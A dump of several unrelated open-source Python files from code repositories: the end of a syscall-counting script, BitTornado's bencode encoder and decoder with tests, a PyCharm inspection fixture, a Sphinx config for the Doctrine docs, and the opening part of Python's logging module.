print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
try:
print "%-40s %10d\n" % (syscall_name(id), val),
except TypeError:
pass
syscalls.clear()
time.sleep(interval)
|
lehoanganh/kcsdb
|
refs/heads/master
|
chef-repo/.chef/murder-kcsd/dist/BitTornado/bencode.py
|
17
|
# Written by Petru Paler, Uoti Urpala, Ross Cohen and John Hoffman
# see LICENSE.txt for license information
from types import IntType, LongType, StringType, ListType, TupleType, DictType
try:
from types import BooleanType
except ImportError:
BooleanType = None
try:
from types import UnicodeType
except ImportError:
UnicodeType = None
from cStringIO import StringIO
def decode_int(x, f):
f += 1
newf = x.index('e', f)
try:
n = int(x[f:newf])
except:
n = long(x[f:newf])
if x[f] == '-':
if x[f + 1] == '0':
raise ValueError
elif x[f] == '0' and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(':', f)
try:
n = int(x[f:colon])
except (OverflowError, ValueError):
n = long(x[f:colon])
if x[f] == '0' and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_unicode(x, f):
s, f = decode_string(x, f+1)
return (s.decode('UTF-8'),f)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 'e':
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
lastkey = None
while x[f] != 'e':
k, f = decode_string(x, f)
if lastkey >= k:
raise ValueError
lastkey = k
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func['l'] = decode_list
decode_func['d'] = decode_dict
decode_func['i'] = decode_int
decode_func['0'] = decode_string
decode_func['1'] = decode_string
decode_func['2'] = decode_string
decode_func['3'] = decode_string
decode_func['4'] = decode_string
decode_func['5'] = decode_string
decode_func['6'] = decode_string
decode_func['7'] = decode_string
decode_func['8'] = decode_string
decode_func['9'] = decode_string
#decode_func['u'] = decode_unicode
def bdecode(x, sloppy = 0):
try:
r, l = decode_func[x[0]](x, 0)
# except (IndexError, KeyError):
except (IndexError, KeyError, ValueError):
raise ValueError, "bad bencoded data"
if not sloppy and l != len(x):
raise ValueError, "bad bencoded data"
return r
def test_bdecode():
try:
bdecode('0:0:')
assert 0
except ValueError:
pass
try:
bdecode('ie')
assert 0
except ValueError:
pass
try:
bdecode('i341foo382e')
assert 0
except ValueError:
pass
assert bdecode('i4e') == 4L
assert bdecode('i0e') == 0L
assert bdecode('i123456789e') == 123456789L
assert bdecode('i-10e') == -10L
try:
bdecode('i-0e')
assert 0
except ValueError:
pass
try:
bdecode('i123')
assert 0
except ValueError:
pass
try:
bdecode('')
assert 0
except ValueError:
pass
try:
bdecode('i6easd')
assert 0
except ValueError:
pass
try:
bdecode('35208734823ljdahflajhdf')
assert 0
except ValueError:
pass
try:
bdecode('2:abfdjslhfld')
assert 0
except ValueError:
pass
assert bdecode('0:') == ''
assert bdecode('3:abc') == 'abc'
assert bdecode('10:1234567890') == '1234567890'
try:
bdecode('02:xy')
assert 0
except ValueError:
pass
try:
bdecode('l')
assert 0
except ValueError:
pass
assert bdecode('le') == []
try:
bdecode('leanfdldjfh')
assert 0
except ValueError:
pass
assert bdecode('l0:0:0:e') == ['', '', '']
try:
bdecode('relwjhrlewjh')
assert 0
except ValueError:
pass
assert bdecode('li1ei2ei3ee') == [1, 2, 3]
assert bdecode('l3:asd2:xye') == ['asd', 'xy']
assert bdecode('ll5:Alice3:Bobeli2ei3eee') == [['Alice', 'Bob'], [2, 3]]
try:
bdecode('d')
assert 0
except ValueError:
pass
try:
bdecode('defoobar')
assert 0
except ValueError:
pass
assert bdecode('de') == {}
assert bdecode('d3:agei25e4:eyes4:bluee') == {'age': 25, 'eyes': 'blue'}
assert bdecode('d8:spam.mp3d6:author5:Alice6:lengthi100000eee') == {'spam.mp3': {'author': 'Alice', 'length': 100000}}
try:
bdecode('d3:fooe')
assert 0
except ValueError:
pass
try:
bdecode('di1e0:e')
assert 0
except ValueError:
pass
try:
bdecode('d1:b0:1:a0:e')
assert 0
except ValueError:
pass
try:
bdecode('d1:a0:1:a0:e')
assert 0
except ValueError:
pass
try:
bdecode('i03e')
assert 0
except ValueError:
pass
try:
bdecode('l01:ae')
assert 0
except ValueError:
pass
try:
bdecode('9999:x')
assert 0
except ValueError:
pass
try:
bdecode('l0:')
assert 0
except ValueError:
pass
try:
bdecode('d0:0:')
assert 0
except ValueError:
pass
try:
bdecode('d0:')
assert 0
except ValueError:
pass
bencached_marker = []
class Bencached:
def __init__(self, s):
self.marker = bencached_marker
self.bencoded = s
BencachedType = type(Bencached('')) # insufficient, but good as a filter
def encode_bencached(x,r):
assert x.marker == bencached_marker
r.append(x.bencoded)
def encode_int(x,r):
r.extend(('i',str(x),'e'))
def encode_bool(x,r):
encode_int(int(x),r)
def encode_string(x,r):
r.extend((str(len(x)),':',x))
def encode_unicode(x,r):
#r.append('u')
encode_string(x.encode('UTF-8'),r)
def encode_list(x,r):
r.append('l')
for e in x:
encode_func[type(e)](e, r)
r.append('e')
def encode_dict(x,r):
r.append('d')
ilist = x.items()
ilist.sort()
for k,v in ilist:
r.extend((str(len(k)),':',k))
encode_func[type(v)](v, r)
r.append('e')
encode_func = {}
encode_func[BencachedType] = encode_bencached
encode_func[IntType] = encode_int
encode_func[LongType] = encode_int
encode_func[StringType] = encode_string
encode_func[ListType] = encode_list
encode_func[TupleType] = encode_list
encode_func[DictType] = encode_dict
if BooleanType:
encode_func[BooleanType] = encode_bool
if UnicodeType:
encode_func[UnicodeType] = encode_unicode
def bencode(x):
r = []
try:
encode_func[type(x)](x, r)
except:
print "*** error *** could not encode type %s (value: %s)" % (type(x), x)
assert 0
return ''.join(r)
def test_bencode():
assert bencode(4) == 'i4e'
assert bencode(0) == 'i0e'
assert bencode(-10) == 'i-10e'
assert bencode(12345678901234567890L) == 'i12345678901234567890e'
assert bencode('') == '0:'
assert bencode('abc') == '3:abc'
assert bencode('1234567890') == '10:1234567890'
assert bencode([]) == 'le'
assert bencode([1, 2, 3]) == 'li1ei2ei3ee'
assert bencode([['Alice', 'Bob'], [2, 3]]) == 'll5:Alice3:Bobeli2ei3eee'
assert bencode({}) == 'de'
assert bencode({'age': 25, 'eyes': 'blue'}) == 'd3:agei25e4:eyes4:bluee'
assert bencode({'spam.mp3': {'author': 'Alice', 'length': 100000}}) == 'd8:spam.mp3d6:author5:Alice6:lengthi100000eee'
try:
bencode({1: 'foo'})
assert 0
except AssertionError:
pass
try:
import psyco
psyco.bind(bdecode)
psyco.bind(bencode)
except ImportError:
pass
|
siosio/intellij-community
|
refs/heads/master
|
python/testData/inspections/PyRedundantParenthesesInspection/While.py
|
83
|
while <weak_warning descr="Remove redundant parentheses">(True)</weak_warning>:
pass
|
sensukho/mgcommunity
|
refs/heads/master
|
vendor/doctrine/orm/docs/en/conf.py
|
2448
|
# -*- coding: utf-8 -*-
#
# Doctrine 2 ORM documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 18:10:24 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('_exts'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['configurationblock']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Doctrine 2 ORM'
copyright = u'2010-12, Doctrine Project Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2'
# The full version, including alpha/beta/rc tags.
release = '2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'doctrine'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Doctrine2ORMdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Doctrine2ORM.tex', u'Doctrine 2 ORM Documentation',
u'Doctrine Project Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
primary_domain = "dcorm"
def linkcode_resolve(domain, info):
if domain == 'dcorm':
return 'http://'
return None
|
Zhongqilong/kbengine
|
refs/heads/master
|
kbe/res/scripts/common/Lib/logging/__init__.py
|
63
|
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Logging package for Python. Based on PEP 282 and comments thereto in
comp.lang.python.
Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, os, time, io, traceback, warnings, weakref, collections
from string import Template
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'warn', 'warning',
'getLogRecordFactory', 'setLogRecordFactory', 'lastResort']
try:
import threading
except ImportError: #pragma: no cover
threading = None
__author__ = "Vinay Sajip <vinay_sajip@red-dove.com>"
__status__ = "production"
# The following module attributes are no longer updated.
__version__ = "0.5.1.2"
__date__ = "07 February 2010"
#---------------------------------------------------------------------------
# Miscellaneous module data
#---------------------------------------------------------------------------
#
#_startTime is used as the base when calculating the relative time of events
#
_startTime = time.time()
#
#raiseExceptions is used to see if exceptions during handling should be
#propagated
#
raiseExceptions = True
#
# If you don't want threading information in the log, set this to zero
#
logThreads = True
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = True
#
# If you don't want process information in the log, set this to zero
#
logProcesses = True
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelToName = {
CRITICAL: 'CRITICAL',
ERROR: 'ERROR',
WARNING: 'WARNING',
INFO: 'INFO',
DEBUG: 'DEBUG',
NOTSET: 'NOTSET',
}
_nameToLevel = {
'CRITICAL': CRITICAL,
'ERROR': ERROR,
'WARN': WARNING,
'WARNING': WARNING,
'INFO': INFO,
'DEBUG': DEBUG,
'NOTSET': NOTSET,
}
def getLevelName(level):
"""
Return the textual representation of logging level 'level'.
If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,
INFO, DEBUG) then you get the corresponding string. If you have
associated levels with names using addLevelName then the name you have
associated with 'level' is returned.
If a numeric value corresponding to one of the defined levels is passed
in, the corresponding string representation is returned.
Otherwise, the string "Level %s" % level is returned.
"""
# See Issue #22386 for the reason for this convoluted expression
return _levelToName.get(level, _nameToLevel.get(level, ("Level %s" % level)))
def addLevelName(level, levelName):
"""
Associate 'levelName' with 'level'.
This is used when converting levels to text during message formatting.
"""
_acquireLock()
try: #unlikely to cause an exception, but you never know...
_levelToName[level] = levelName
_nameToLevel[levelName] = level
finally:
_releaseLock()
if hasattr(sys, '_getframe'):
currentframe = lambda: sys._getframe(3)
else: #pragma: no cover
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except Exception:
return sys.exc_info()[2].tb_frame.f_back
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame, by skipping frames whose filename is that of this
# module's source. It therefore should contain the filename of this module's
# source file.
#
# Ordinarily we would use __file__ for this, but frozen modules don't always
# have __file__ set, for some reason (see Issue #21736). Thus, we get the
# filename from a handy code object from a function defined in this module.
# (There's no particular reason for picking addLevelName.)
#
_srcfile = os.path.normcase(addLevelName.__code__.co_filename)
# _srcfile is only used in conjunction with sys._getframe().
# To provide compatibility with older versions of Python, set _srcfile
# to None if _getframe() is not available; this value will prevent
# findCaller() from being called. You can also do this if you want to avoid
# the overhead of fetching caller information, even when _getframe() is
# available.
#if not hasattr(sys, '_getframe'):
# _srcfile = None
def _checkLevel(level):
if isinstance(level, int):
rv = level
elif str(level) == level:
if level not in _nameToLevel:
raise ValueError("Unknown level: %r" % level)
rv = _nameToLevel[level]
else:
raise TypeError("Level not an integer or a valid string: %r" % level)
return rv
#---------------------------------------------------------------------------
# Thread-related stuff
#---------------------------------------------------------------------------
#
#_lock is used to serialize access to shared data structures in this module.
#This needs to be an RLock because fileConfig() creates and configures
#Handlers, and so might arbitrary user threads. Since Handler code updates the
#shared dictionary _handlers, it needs to acquire the lock. But if configuring,
#the lock would already have been acquired - so we need an RLock.
#The same argument applies to Loggers and Manager.loggerDict.
#
if threading:
_lock = threading.RLock()
else: #pragma: no cover
_lock = None
def _acquireLock():
"""
Acquire the module-level lock for serializing access to shared data.
This should be released with _releaseLock().
"""
if _lock:
_lock.acquire()
def _releaseLock():
"""
Release the module-level lock acquired by calling _acquireLock().
"""
if _lock:
_lock.release()
#---------------------------------------------------------------------------
# The logging record
#---------------------------------------------------------------------------
class LogRecord(object):
"""
A LogRecord instance represents an event being logged.
LogRecord instances are created every time something is logged. They
contain all the information pertinent to the event being logged. The
main information passed in is in msg and args, which are combined
using str(msg) % args to create the message field of the record. The
record also includes information such as when the record was created,
the source line where the logging call was made, and any exception
information to be logged.
"""
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None, sinfo=None, **kwargs):
"""
Initialize a logging record with interesting information.
"""
ct = time.time()
self.name = name
self.msg = msg
#
# The following statement allows passing of a dictionary as a sole
# argument, so that you can do something like
# logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
# Suggested by Stefan Behnel.
# Note that without the test for args[0], we get a problem because
# during formatting, we test to see if the arg is present using
# 'if self.args:'. If the event being logged is e.g. 'Value is %d'
# and if the passed arg fails 'if self.args:' then no formatting
# is done. For example, logger.warning('Value is %d', 0) would log
# 'Value is %d' instead of 'Value is 0'.
# For the use case of passing a dictionary, this should not be a
# problem.
# Issue #21172: a request was made to relax the isinstance check
# to hasattr(args[0], '__getitem__'). However, the docs on string
# formatting still seem to suggest a mapping object is required.
# Thus, while not removing the isinstance check, it does now look
# for collections.Mapping rather than, as before, dict.
if (args and len(args) == 1 and isinstance(args[0], collections.Mapping)
and args[0]):
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None # used to cache the traceback text
self.stack_info = sinfo
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads and threading:
self.thread = threading.get_ident()
self.threadName = threading.current_thread().name
else: # pragma: no cover
self.thread = None
self.threadName = None
if not logMultiprocessing: # pragma: no cover
self.processName = None
else:
self.processName = 'MainProcess'
mp = sys.modules.get('multiprocessing')
if mp is not None:
# Errors may occur if multiprocessing has not finished loading
# yet - e.g. if a custom import hook causes third-party code
# to run when multiprocessing calls import. See issue 8200
# for an example
try:
self.processName = mp.current_process().name
except Exception: #pragma: no cover
pass
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __str__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
"""
Return the message for this LogRecord.
Return the message for this LogRecord after merging any user-supplied
arguments with the message.
"""
msg = str(self.msg)
if self.args:
msg = msg % self.args
return msg
#
# Determine which class to use when instantiating log records.
#
_logRecordFactory = LogRecord
def setLogRecordFactory(factory):
"""
Set the factory to be used when instantiating a log record.
:param factory: A callable which will be called to instantiate
a log record.
"""
global _logRecordFactory
_logRecordFactory = factory
def getLogRecordFactory():
"""
Return the factory to be used when instantiating a log record.
"""
return _logRecordFactory
def makeLogRecord(dict):
"""
Make a LogRecord whose attributes are defined by the specified dictionary,
This function is useful for converting a logging event received over
a socket connection (which is sent as a dictionary) into a LogRecord
instance.
"""
rv = _logRecordFactory(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
#---------------------------------------------------------------------------
# Formatter classes and functions
#---------------------------------------------------------------------------
class PercentStyle(object):
default_format = '%(message)s'
asctime_format = '%(asctime)s'
asctime_search = '%(asctime)'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
def usesTime(self):
return self._fmt.find(self.asctime_search) >= 0
def format(self, record):
return self._fmt % record.__dict__
class StrFormatStyle(PercentStyle):
default_format = '{message}'
asctime_format = '{asctime}'
asctime_search = '{asctime'
def format(self, record):
return self._fmt.format(**record.__dict__)
class StringTemplateStyle(PercentStyle):
default_format = '${message}'
asctime_format = '${asctime}'
asctime_search = '${asctime}'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
self._tpl = Template(self._fmt)
def usesTime(self):
fmt = self._fmt
return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0
def format(self, record):
return self._tpl.substitute(**record.__dict__)
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
_STYLES = {
'%': (PercentStyle, BASIC_FORMAT),
'{': (StrFormatStyle, '{levelname}:{name}:{message}'),
'$': (StringTemplateStyle, '${levelname}:${name}:${message}'),
}
class Formatter(object):
"""
Formatter instances are used to convert a LogRecord to text.
Formatters need to know how a LogRecord is constructed. They are
responsible for converting a LogRecord to (usually) a string which can
be interpreted by either a human or an external system. The base Formatter
allows a formatting string to be specified. If none is supplied, the
default value of "%s(message)" is used.
The Formatter can be initialized with a format string which makes use of
knowledge of the LogRecord attributes - e.g. the default value mentioned
above makes use of the fact that the user's message and arguments are pre-
formatted into a LogRecord's message attribute. Currently, the useful
attributes in a LogRecord are described by:
%(name)s Name of the logger (logging channel)
%(levelno)s Numeric logging level for the message (DEBUG, INFO,
WARNING, ERROR, CRITICAL)
%(levelname)s Text logging level for the message ("DEBUG", "INFO",
"WARNING", "ERROR", "CRITICAL")
%(pathname)s Full pathname of the source file where the logging
call was issued (if available)
%(filename)s Filename portion of pathname
%(module)s Module (name portion of filename)
%(lineno)d Source line number where the logging call was issued
(if available)
%(funcName)s Function name
%(created)f Time when the LogRecord was created (time.time()
return value)
%(asctime)s Textual time when the LogRecord was created
%(msecs)d Millisecond portion of the creation time
%(relativeCreated)d Time in milliseconds when the LogRecord was created,
relative to the time the logging module was loaded
(typically at application startup time)
%(thread)d Thread ID (if available)
%(threadName)s Thread name (if available)
%(process)d Process ID (if available)
%(message)s The result of record.getMessage(), computed just as
the record is emitted
"""
converter = time.localtime
def __init__(self, fmt=None, datefmt=None, style='%'):
"""
Initialize the formatter with specified format strings.
Initialize the formatter either with the specified format string, or a
default as described above. Allow for specialized date formatting with
the optional datefmt argument (if omitted, you get the ISO8601 format).
Use a style parameter of '%', '{' or '$' to specify that you want to
use one of %-formatting, :meth:`str.format` (``{}``) formatting or
:class:`string.Template` formatting in your format string.
.. versionchanged: 3.2
Added the ``style`` parameter.
"""
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
self._style = _STYLES[style][0](fmt)
self._fmt = self._style._fmt
self.datefmt = datefmt
default_time_format = '%Y-%m-%d %H:%M:%S'
default_msec_format = '%s,%03d'
def formatTime(self, record, datefmt=None):
"""
Return the creation time of the specified LogRecord as formatted text.
This method should be called from format() by a formatter which
wants to make use of a formatted time. This method can be overridden
in formatters to provide for any specific requirement, but the
basic behaviour is as follows: if datefmt (a string) is specified,
it is used with time.strftime() to format the creation time of the
record. Otherwise, the ISO8601 format is used. The resulting
string is returned. This function uses a user-configurable function
to convert the creation time to a tuple. By default, time.localtime()
is used; to change this for a particular formatter instance, set the
'converter' attribute to a function with the same signature as
time.localtime() or time.gmtime(). To change it for all formatters,
for example if you want all logging times to be shown in GMT,
set the 'converter' attribute in the Formatter class.
"""
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
t = time.strftime(self.default_time_format, ct)
s = self.default_msec_format % (t, record.msecs)
return s
def formatException(self, ei):
"""
Format and return the specified exception information as a string.
This default implementation just uses
traceback.print_exception()
"""
sio = io.StringIO()
tb = ei[2]
# See issues #9427, #1553375. Commented out for now.
#if getattr(self, 'fullstack', False):
# traceback.print_stack(tb.tb_frame.f_back, file=sio)
traceback.print_exception(ei[0], ei[1], tb, None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def usesTime(self):
"""
Check if the format uses the creation time of the record.
"""
return self._style.usesTime()
def formatMessage(self, record):
return self._style.format(record)
def formatStack(self, stack_info):
"""
This method is provided as an extension point for specialized
formatting of stack information.
The input data is a string as returned from a call to
:func:`traceback.print_stack`, but with the last trailing newline
removed.
The base implementation just returns the value passed in.
"""
return stack_info
def format(self, record):
"""
Format the specified record as text.
The record's attribute dictionary is used as the operand to a
string formatting operation which yields the returned string.
Before formatting the dictionary, a couple of preparatory steps
are carried out. The message attribute of the record is computed
using LogRecord.getMessage(). If the formatting string uses the
time (as determined by a call to usesTime(), formatTime() is
called to format the event time. If there is exception information,
it is formatted using formatException() and appended to the message.
"""
record.message = record.getMessage()
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
if record.stack_info:
if s[-1:] != "\n":
s = s + "\n"
s = s + self.formatStack(record.stack_info)
return s
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
class BufferingFormatter(object):
"""
A formatter suitable for formatting a number of records.
"""
def __init__(self, linefmt=None):
"""
Optionally specify a formatter which will be used to format each
individual record.
"""
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
"""
Return the header string for the specified records.
"""
return ""
def formatFooter(self, records):
"""
Return the footer string for the specified records.
"""
return ""
def format(self, records):
"""
Format the specified records and return the result as a string.
"""
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter(object):
"""
Filter instances are used to perform arbitrary filtering of LogRecords.
Loggers and Handlers can optionally use Filter instances to filter
records as desired. The base filter class only allows events which are
below a certain point in the logger hierarchy. For example, a filter
initialized with "A.B" will allow events logged by loggers "A.B",
"A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If
initialized with the empty string, all events are passed.
"""
def __init__(self, name=''):
"""
Initialize a filter.
Initialize with the name of the logger which, together with its
children, will have its events allowed through the filter. If no
name is specified, allow every event.
"""
self.name = name
self.nlen = len(name)
def filter(self, record):
"""
Determine if the specified record is to be logged.
Is the specified record to be logged? Returns 0 for no, nonzero for
yes. If deemed appropriate, the record may be modified in-place.
"""
if self.nlen == 0:
return True
elif self.name == record.name:
return True
elif record.name.find(self.name, 0, self.nlen) != 0:
return False
return (record.name[self.nlen] == ".")
class Filterer(object):
"""
A base class for loggers and handlers which allows them to share
common code.
"""
def __init__(self):
"""
Initialize the list of filters to be an empty list.
"""
self.filters = []
def addFilter(self, filter):
"""
Add the specified filter to this handler.
"""
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
"""
Remove the specified filter from this handler.
"""
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
"""
Determine if a record is loggable by consulting all the filters.
The default is to allow the record to be logged; any filter can veto
this and the record is then dropped. Returns a zero value if a record
is to be dropped, else non-zero.
.. versionchanged: 3.2
Allow filters to be just callables.
"""
rv = True
for f in self.filters:
if hasattr(f, 'filter'):
result = f.filter(record)
else:
result = f(record) # assume callable - will raise if not
if not result:
rv = False
break
return rv
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = weakref.WeakValueDictionary() #map of handler names to handlers
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
def _removeHandlerRef(wr):
"""
Remove a handler reference from the internal cleanup list.
"""
# This function can be called during module teardown, when globals are
# set to None. It can also be called from another thread. So we need to
# pre-emptively grab the necessary globals and check if they're None,
# to prevent race conditions and failures during interpreter shutdown.
acquire, release, handlers = _acquireLock, _releaseLock, _handlerList
if acquire and release and handlers:
acquire()
try:
if wr in handlers:
handlers.remove(wr)
finally:
release()
def _addHandlerRef(handler):
"""
Add a handler to the internal cleanup list using a weak reference.
"""
_acquireLock()
try:
_handlerList.append(weakref.ref(handler, _removeHandlerRef))
finally:
_releaseLock()
class Handler(Filterer):
"""
Handler instances dispatch logging events to specific destinations.
The base handler class. Acts as a placeholder which defines the Handler
interface. Handlers can optionally use Formatter instances to format
records as desired. By default, no formatter is specified; in this case,
the 'raw' message as determined by record.message is logged.
"""
def __init__(self, level=NOTSET):
"""
Initializes the instance - basically setting the formatter to None
and the filter list to empty.
"""
Filterer.__init__(self)
self._name = None
